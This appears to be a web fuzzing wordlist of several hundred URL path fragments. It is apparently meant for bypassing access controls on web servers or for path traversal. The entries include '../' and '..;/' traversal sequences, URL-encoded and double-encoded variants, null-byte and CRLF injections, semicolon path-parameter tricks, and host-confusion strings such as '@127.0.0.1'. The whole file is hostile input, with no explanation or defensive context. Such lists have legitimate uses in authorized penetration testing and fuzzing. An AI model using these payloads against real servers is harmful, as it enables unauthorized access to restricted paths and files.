~
;
;///..
;///../
;///..//
;//..
;//../../
;/.;.
;/..
;/..;
;/..;/
;/../
;/../;/
;/../;/../
;/..//
;/..///
;/..//../
;/../.;/../
;/.././../
;/../../
;/../..//
?
??
?#
/
/;
/;/
/;//
/;/..;/
/;/../
/?
//
//;/
///..
///..;
///..;/
///..;//
///../
///..//
//.;/
//./
//..
//..;
//..;/
//../
//../../
/.;/
/.;//
/./
/.//
/..
/..;/
/..;/;/
/..;/;/..;/
/..;//
/..;//..;/
/..;//../
/..;/..;/
/..;/../
/../
/../;/
/../;/../
/..//
/..//..;/
/..//../
/..//../../
/../.;/../
/.././../
/../..;/
/../../
/../..//
/../..//../
/../../../
/../../..//
/*
/*/
/#
.;//
./
./.
..
..;/
..;/;/
..;//
..;\
..;\;
../
../;/
..//
.././
..\
..\;
&
#
#?
%
..;%00/
..%00;/
..%00/
..%00/;
%00
;%09
;%09;
;%09..
;%09..;
..%09
%09
%09;
%09..
%09%3b
%0a%0d
..;%0d/
..%0d
..%0d;/
..%0d/
..%0d/;
%0d
@127.0.0.1
/%20
/%20#
%20
/%20%23
/%23
%23
%23%3f
%25
/%252e/
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252f
%252f/
%252f%252f
%26
;/.%2e
;/%2e.
/%2e/
/%2e//
.%2e/
;/..//%2e%2e/
;/%2e%2e
;/%2e%2e/
/%2e%2e
/%2e%2e/
%2e%2e
%2e%2e/
;/.%2e/%2e%2e/%2f
;/%2e%2e%2f/
/%2e%2e%2f/
%2e%2e%2f
;/%2e%2e%2f%2f
/%2e%2e%3b/
/%2e%2f/
/%2e%3b/
/%2e%3b//
;%2F..
;//%2f../
;/..//%2f
;/../%2f/
;/..%2f
;/..%2f/
;/..%2f//
;/%2f/../
;%2f;/;/..;/
;%2f;//../
;%2f/;/..;/
;%2f/;/../
;%2f//..;/
;%2f//../
;%2f..
;%2f..;/;//
;%2f..;//;/
;%2f..;///
;%2f../;/;/
;%2f../;/;/;
;%2f../;//
;%2f..//;/
;%2f..//;/;
;%2f..///
;%2f..///;
;%2f..//../
/..;%2f
/..%2f
/%2f
/%2f/
..%2f
%2f
%2f/
%2f%20%23
%2f%23
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;/..%2f..%2f
;/..%2f%2f../
;/%2f/..%2f
;/%2f%2f../
;%2f//..%2f
;%2f/%2f../
;%2f..//..%2f
;%2f../%2f../
;%2f..%2f/
;%2f..%2f/../
;%2f%2f/../
/..;%2f..;%2f
/..%2f..%2f
%2f%2f
;%2f..%2f%2e%2e%2f%2f
;%2f../%2f..%2f
;%2f..%2f/..%2f
/..;%2f..;%2f..;%2f
/..%2f..%2f..%2f
;%2f..%2f..%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
/%3b/
%3b
%3b/..
%3b%09
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b//%2f../
%3b%2f..
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b/%2f%2f../
%3f
%3f%23
%3f%3f
..%5c
..%5c/
%5c
..;%ff/
..%ff;/
..%ff/
..%ff/;
.html
.json
